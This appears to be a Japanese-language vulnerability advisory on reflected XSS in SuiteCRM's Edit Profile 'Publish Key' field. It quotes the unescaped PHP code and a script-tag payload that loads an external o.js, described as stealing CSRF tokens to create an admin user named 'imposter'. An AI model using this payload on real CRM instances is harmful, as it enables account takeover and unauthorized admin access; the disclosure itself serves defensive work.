
SuiteCRMのセキュリティ脆弱性で、CSRFトークンを窃取し、適切な認証なしに新しい管理ユーザーを作成するなどの不正な操作を実行するために悪用される可能性があります。
SuiteCRMのEdit Profileページにある「Publish Key」フィールドは、反射型クロスサイトスクリプティング (XSS) に対して脆弱であり、攻撃者が悪意のあるJavaScriptコードを注入できる可能性があります。これを悪用すると、CSRFトークンを窃取し、適切な認証なしに新しい管理者ユーザーを作成するなどの不正な操作を実行できます。
この脆弱性は、SuiteCRMアプリケーション内のPublish Keyフィールドに対する入力検証とサニタイズが不十分であるために発生します。攻撃者が悪意のあるスクリプトを注入すると、認証済みユーザーのセッションのコンテキスト内でそれが実行されます。注入されたスクリプト (o.js) は、取得したCSRFトークンを利用して新しい管理者ユーザーを作成するリクエストを偽造し、CRMインスタンスの整合性とセキュリティを実質的に損ないます。
この脆弱性は、クリティカルなクロスサイトスクリプティング (XSS) の問題です。その影響は次のとおりです。
$publish_key = $this->bean->getPreference('calendar_publish_key');
$this->ss->assign('CALENDAR_PUBLISH_KEY', $publish_key);
$publish_url = $sugar_config['site_url'] . '/vcal_server.php';
$token = "/";
$publish_url .= $token . "type=vfb&source=outlook&key=<span id=\"cal_pub_key_span\">$publish_key</span>";
$ical_url = $sugar_config['site_url'] . "/ical_server.php?type=ics&key=<span id=\"ical_pub_key_span\">$publish_key</span>";
$this->ss->assign("CALENDAR_PUBLISH_URL", $publish_url);
$this->ss->assign("CALENDAR_ICAL_URL", $ical_url);
<script src=//localhost:1235/o.js>
Username - imposter
Password - ok
https://github.com/user-attachments/assets/cdf96f3d-7f61-4371-818b-e344efdcd197